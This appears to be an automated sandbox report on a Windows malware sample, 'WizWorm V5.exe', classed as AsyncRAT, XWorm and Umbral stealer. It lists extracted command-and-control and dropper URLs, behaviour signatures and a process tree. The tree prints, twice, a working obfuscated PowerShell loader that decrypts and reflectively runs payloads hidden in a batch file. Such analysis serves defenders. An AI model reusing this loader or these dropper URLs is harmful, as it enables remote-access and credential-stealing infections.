asyncrat | fc2c1679e7d3b6abb01b8c38dec3f16d56d173940a06181244330aa0bc30ab4c

Analysis

max time kernel
20s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
25-07-2024 18:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WizWorm V5/WizWorm V5.exe
Size

21.3MB
MD5

c831f8de57e6bc935d531d95999b7364
SHA1

a85f7c7946e458cf1ba64a233b3932cc314c9cad
SHA256

e1559165017c04cebc3d56bbb9cc7f5b7b18e520f2eec6f77484496e204a92ca
SHA512

1429f4700398b62d70dd51233d95b79aebc0e5a04aa31fea7304cee7b3f7723cd4f8d451945b088615f0f3f77777dfc3e4b8615ce51c42c247a9f392fe46749d
SSDEEP

393216:uSrV5LLmx9KZlGlDAzkG7N2mZ8GeVnBmdRqBXsXG6kik5l1aGEWvPBqeh3:B5R5zkG7/OGe6dReXN6CuGpv

Score

10^/10

asyncrat umbral xworm default credential_access discovery execution rat spyware stealer trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/eq44/d/raw/main/wzcstatus.exe

exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Version

3.1

true-baghdad.gl.at.ply.gg:61202

Mutex

Z0m98pC7RpsdD0uc

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

asyncrat

Version

WeedRAT

Botnet

Default

true-baghdad.gl.at.ply.gg:61202

Mutex

xInKFBCkbzDz

Attributes

delay
3
install
true
install_file
wzcdetect.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Umbral payload 4 IoCs

resource	yara_rule
behavioral3/files/0x00070000000234e0-72.dat	family_umbral
behavioral3/memory/2372-81-0x000001CF4C230000-0x000001CF4C270000-memory.dmp	family_umbral
behavioral3/memory/6428-1072-0x0000020CB4F20000-0x0000020CB4F60000-memory.dmp	family_umbral
behavioral3/memory/5440-2316-0x000001D0B14D0000-0x000001D0B1510000-memory.dmp	family_umbral

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral3/memory/640-50-0x000001A542090000-0x000001A54209E000-memory.dmp	family_xworm

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral3/files/0x00070000000234df-62.dat	family_asyncrat

Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Blocklisted process makes network request 1 IoCs

flow	pid	Process
34	640	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 54 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
6120	powershell.exe
1888	powershell.exe
2152	powershell.exe
6464	powershell.exe
6764	powershell.exe
3500	powershell.exe
4480	powershell.exe
5468	powershell.exe
3316	powershell.exe
2544	powershell.exe
1064	powershell.exe
6436	powershell.exe
6200	powershell.exe
6668	powershell.exe
2200	powershell.exe
6288	powershell.exe
3900	powershell.exe
6116	powershell.exe
6252	powershell.exe
5144	powershell.exe
1316	powershell.exe
7020	powershell.exe
5048	powershell.exe
828	powershell.exe
7136	powershell.exe
2456	powershell.exe
6032	powershell.exe
2120	powershell.exe
2028	powershell.exe
1992	powershell.exe
2308	powershell.exe
5824	powershell.exe
6628	powershell.exe
640	powershell.exe
5264	powershell.exe
3360	powershell.exe
5928	powershell.exe
432	powershell.exe
7112	powershell.exe
6472	powershell.exe
6400	powershell.exe
4024	powershell.exe
828	powershell.exe
464	powershell.exe
1408	powershell.exe
2964	powershell.exe
984	powershell.exe
2364	powershell.exe
6076	powershell.exe
1844	powershell.exe
5888	powershell.exe
6504	powershell.exe
6068	powershell.exe
1768	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	sihost.exe

Checks computer location settings 2 TTPs 12 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	WizWorm V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	WizWormV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	WizWormV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	WeedClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	WizWormV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	WeedClient.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	WizWormV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	WizWormV4.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation	RoboterXRAT V5.exe

Executes dropped EXE 21 IoCs

pid	Process
3624	WizWormV4.exe
3812	WizWormV4.exe
5012	RoboterXRAT V5.exe
1316	WizWormV4.exe
4088	RoboterXRAT V5.exe
3196	RoboterXRAT V5.exe
4412	WeedClient.exe
2372	sihost.exe
2000	WizWormV4.exe
2024	RoboterXRAT V5.exe
684	RoboterXRAT V5.exe
3296	WeedClient.exe
4448	sihost.exe
4192	WizWormV4.exe
2364	RoboterXRAT V5.exe
3700	RoboterXRAT V5.exe
4076	WeedClient.exe
1472	sihost.exe
3116	WizWormV4.exe
1532	RoboterXRAT V5.exe
5168	RoboterXRAT V5.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs

Web Service

T1102

flow	ioc
150	discord.com
70	raw.githubusercontent.com
76	discord.com
93	discord.com
74	raw.githubusercontent.com
92	discord.com
125	discord.com
116	discord.com
124	discord.com
149	discord.com
81	raw.githubusercontent.com
117	discord.com
136	discord.com
137	discord.com
46	raw.githubusercontent.com
47	raw.githubusercontent.com
75	discord.com

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
120	ip-api.com
129	ip-api.com
141	ip-api.com
27	ip-api.com
84	ip-api.com
99	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WeedClient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4600	cmd.exe
6552	PING.EXE
5996	cmd.exe
2348	PING.EXE
6336	PING.EXE
876	PING.EXE
5708	cmd.exe
6896	PING.EXE
2884	cmd.exe
1476	cmd.exe

Delays execution with timeout.exe 4 IoCs

evasion

pid	Process
4496	timeout.exe
5828	timeout.exe
5412	timeout.exe
5728	timeout.exe

Detects videocard installed 1 TTPs 6 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
6056	wmic.exe
1912	wmic.exe
5300	wmic.exe
4148	wmic.exe
4596	wmic.exe
3208	wmic.exe

Runs net.exe

Runs ping.exe 1 TTPs 5 IoCs

Remote System Discovery

T1018

pid	Process
876	PING.EXE
6552	PING.EXE
6896	PING.EXE
2348	PING.EXE
6336	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2452	schtasks.exe
5296	schtasks.exe
1752	schtasks.exe
5908	schtasks.exe
6084	schtasks.exe
1532	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
640	powershell.exe
640	powershell.exe
2372	sihost.exe
2372	sihost.exe
464	powershell.exe
464	powershell.exe
464	powershell.exe
1888	powershell.exe
1888	powershell.exe
1888	powershell.exe
4480	powershell.exe
4480	powershell.exe
4480	powershell.exe
1316	powershell.exe
1316	powershell.exe
1316	powershell.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4412	WeedClient.exe
4828	powershell.exe
4828	powershell.exe
4828	powershell.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe
3296	WeedClient.exe

Suspicious use of AdjustPrivilegeToken 51 IoCs

description	pid	Process
Token: SeDebugPrivilege	640	powershell.exe
Token: SeDebugPrivilege	2372	sihost.exe
Token: SeIncreaseQuotaPrivilege	3300	wmic.exe
Token: SeSecurityPrivilege	3300	wmic.exe
Token: SeTakeOwnershipPrivilege	3300	wmic.exe
Token: SeLoadDriverPrivilege	3300	wmic.exe
Token: SeSystemProfilePrivilege	3300	wmic.exe
Token: SeSystemtimePrivilege	3300	wmic.exe
Token: SeProfSingleProcessPrivilege	3300	wmic.exe
Token: SeIncBasePriorityPrivilege	3300	wmic.exe
Token: SeCreatePagefilePrivilege	3300	wmic.exe
Token: SeBackupPrivilege	3300	wmic.exe
Token: SeRestorePrivilege	3300	wmic.exe
Token: SeShutdownPrivilege	3300	wmic.exe
Token: SeDebugPrivilege	3300	wmic.exe
Token: SeSystemEnvironmentPrivilege	3300	wmic.exe
Token: SeRemoteShutdownPrivilege	3300	wmic.exe
Token: SeUndockPrivilege	3300	wmic.exe
Token: SeManageVolumePrivilege	3300	wmic.exe
Token: 33	3300	wmic.exe
Token: 34	3300	wmic.exe
Token: 35	3300	wmic.exe
Token: 36	3300	wmic.exe
Token: SeIncreaseQuotaPrivilege	3300	wmic.exe
Token: SeSecurityPrivilege	3300	wmic.exe
Token: SeTakeOwnershipPrivilege	3300	wmic.exe
Token: SeLoadDriverPrivilege	3300	wmic.exe
Token: SeSystemProfilePrivilege	3300	wmic.exe
Token: SeSystemtimePrivilege	3300	wmic.exe
Token: SeProfSingleProcessPrivilege	3300	wmic.exe
Token: SeIncBasePriorityPrivilege	3300	wmic.exe
Token: SeCreatePagefilePrivilege	3300	wmic.exe
Token: SeBackupPrivilege	3300	wmic.exe
Token: SeRestorePrivilege	3300	wmic.exe
Token: SeShutdownPrivilege	3300	wmic.exe
Token: SeDebugPrivilege	3300	wmic.exe
Token: SeSystemEnvironmentPrivilege	3300	wmic.exe
Token: SeRemoteShutdownPrivilege	3300	wmic.exe
Token: SeUndockPrivilege	3300	wmic.exe
Token: SeManageVolumePrivilege	3300	wmic.exe
Token: 33	3300	wmic.exe
Token: 34	3300	wmic.exe
Token: 35	3300	wmic.exe
Token: 36	3300	wmic.exe
Token: SeDebugPrivilege	464	powershell.exe
Token: SeDebugPrivilege	1888	powershell.exe
Token: SeDebugPrivilege	4480	powershell.exe
Token: SeDebugPrivilege	1316	powershell.exe
Token: SeDebugPrivilege	4412	WeedClient.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	3296	WeedClient.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4120 wrote to memory of 3624	4120	WizWorm V5.exe	89
PID 4120 wrote to memory of 3624	4120	WizWorm V5.exe	89
PID 3624 wrote to memory of 3812	3624	WizWormV4.exe	93
PID 3624 wrote to memory of 3812	3624	WizWormV4.exe	93
PID 3624 wrote to memory of 5004	3624	WizWormV4.exe	94
PID 3624 wrote to memory of 5004	3624	WizWormV4.exe	94
PID 3624 wrote to memory of 5012	3624	WizWormV4.exe	96
PID 3624 wrote to memory of 5012	3624	WizWormV4.exe	96
PID 5004 wrote to memory of 2312	5004	cmd.exe	97
PID 5004 wrote to memory of 2312	5004	cmd.exe	97
PID 2312 wrote to memory of 5000	2312	net.exe	98
PID 2312 wrote to memory of 5000	2312	net.exe	98
PID 5004 wrote to memory of 640	5004	cmd.exe	99
PID 5004 wrote to memory of 640	5004	cmd.exe	99
PID 3812 wrote to memory of 1316	3812	WizWormV4.exe	129
PID 3812 wrote to memory of 1316	3812	WizWormV4.exe	129
PID 3812 wrote to memory of 3800	3812	WizWormV4.exe	532
PID 3812 wrote to memory of 3800	3812	WizWormV4.exe	532
PID 3812 wrote to memory of 4088	3812	WizWormV4.exe	140
PID 3812 wrote to memory of 4088	3812	WizWormV4.exe	140
PID 5012 wrote to memory of 3196	5012	RoboterXRAT V5.exe	435
PID 5012 wrote to memory of 3196	5012	RoboterXRAT V5.exe	435
PID 5012 wrote to memory of 4412	5012	RoboterXRAT V5.exe	220
PID 5012 wrote to memory of 4412	5012	RoboterXRAT V5.exe	220
PID 5012 wrote to memory of 4412	5012	RoboterXRAT V5.exe	220
PID 5012 wrote to memory of 2372	5012	RoboterXRAT V5.exe	108
PID 5012 wrote to memory of 2372	5012	RoboterXRAT V5.exe	108
PID 3800 wrote to memory of 4956	3800	cmd.exe	217
PID 3800 wrote to memory of 4956	3800	cmd.exe	217
PID 4956 wrote to memory of 4376	4956	net.exe	328
PID 4956 wrote to memory of 4376	4956	net.exe	328
PID 2372 wrote to memory of 3300	2372	sihost.exe	146
PID 2372 wrote to memory of 3300	2372	sihost.exe	146
PID 2372 wrote to memory of 3500	2372	sihost.exe	605
PID 2372 wrote to memory of 3500	2372	sihost.exe	605
PID 3800 wrote to memory of 464	3800	cmd.exe	115
PID 3800 wrote to memory of 464	3800	cmd.exe	115
PID 2372 wrote to memory of 1888	2372	sihost.exe	271
PID 2372 wrote to memory of 1888	2372	sihost.exe	271
PID 1316 wrote to memory of 2000	1316	WizWormV4.exe	118
PID 1316 wrote to memory of 2000	1316	WizWormV4.exe	118
PID 1316 wrote to memory of 4708	1316	WizWormV4.exe	594
PID 1316 wrote to memory of 4708	1316	WizWormV4.exe	594
PID 1316 wrote to memory of 684	1316	WizWormV4.exe	245
PID 1316 wrote to memory of 684	1316	WizWormV4.exe	245
PID 4088 wrote to memory of 2024	4088	RoboterXRAT V5.exe	398
PID 4088 wrote to memory of 2024	4088	RoboterXRAT V5.exe	398
PID 4088 wrote to memory of 3296	4088	RoboterXRAT V5.exe	123
PID 4088 wrote to memory of 3296	4088	RoboterXRAT V5.exe	123
PID 4088 wrote to memory of 3296	4088	RoboterXRAT V5.exe	123
PID 4088 wrote to memory of 4448	4088	RoboterXRAT V5.exe	124
PID 4088 wrote to memory of 4448	4088	RoboterXRAT V5.exe	124
PID 4708 wrote to memory of 2456	4708	cmd.exe	383
PID 4708 wrote to memory of 2456	4708	cmd.exe	383
PID 2456 wrote to memory of 3612	2456	net.exe	126
PID 2456 wrote to memory of 3612	2456	net.exe	126
PID 2372 wrote to memory of 4480	2372	sihost.exe	136
PID 2372 wrote to memory of 4480	2372	sihost.exe	136
PID 2372 wrote to memory of 1316	2372	sihost.exe	129
PID 2372 wrote to memory of 1316	2372	sihost.exe	129
PID 2000 wrote to memory of 4192	2000	WizWormV4.exe	131
PID 2000 wrote to memory of 4192	2000	WizWormV4.exe	131
PID 2000 wrote to memory of 2432	2000	WizWormV4.exe	132
PID 2000 wrote to memory of 2432	2000	WizWormV4.exe	132

Views/modifies file attributes 1 TTPs 6 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3176	attrib.exe
6992	attrib.exe
5756	attrib.exe
3156	attrib.exe
3872	attrib.exe
3500	attrib.exe

C:\Users\Admin\AppData\Local\Temp\WizWorm V5\WizWorm V5.exe
"C:\Users\Admin\AppData\Local\Temp\WizWorm V5\WizWorm V5.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4120
- C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
  "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3624
- - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
    "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3812
  - - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
      "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1316
    - - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2000
      - C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4192
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        7⤵
        Executes dropped EXE
        
        PID:3116
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        8⤵
        
        PID:5744
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        9⤵
        
        PID:5376
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        10⤵
        
        PID:5944
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        11⤵
        
        PID:4924
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        12⤵
        
        PID:5728
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        13⤵
        
        PID:5760
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        14⤵
        
        PID:468
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        15⤵
        
        PID:1756
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        16⤵
        
        PID:1096
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        17⤵
        
        PID:3196
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        18⤵
        
        PID:4376
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        19⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        20⤵
        
        PID:6860
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        21⤵
        
        PID:3792
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        22⤵
        
        PID:5824
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        23⤵
        
        PID:2024
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        24⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        25⤵
        
        PID:2508
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        26⤵
        
        PID:4068
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        27⤵
        
        PID:6476
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        28⤵
        
        PID:6208
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        29⤵
        
        PID:4844
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        30⤵
        
        PID:3832
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        31⤵
        
        PID:1992
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        32⤵
        
        PID:6184
        
        C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WizWormV4.exe"
        33⤵
        
        PID:4112
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        33⤵
        
        PID:5164
        
        C:\Windows\system32\net.exe
        
        net file
        34⤵
        
        PID:1212
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        35⤵
        
        PID:6360
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        34⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2364
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        33⤵
        
        PID:876
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        32⤵
        
        PID:1532
        
        C:\Windows\system32\net.exe
        
        net file
        33⤵
        
        PID:5996
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        34⤵
        
        PID:3800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6504
        
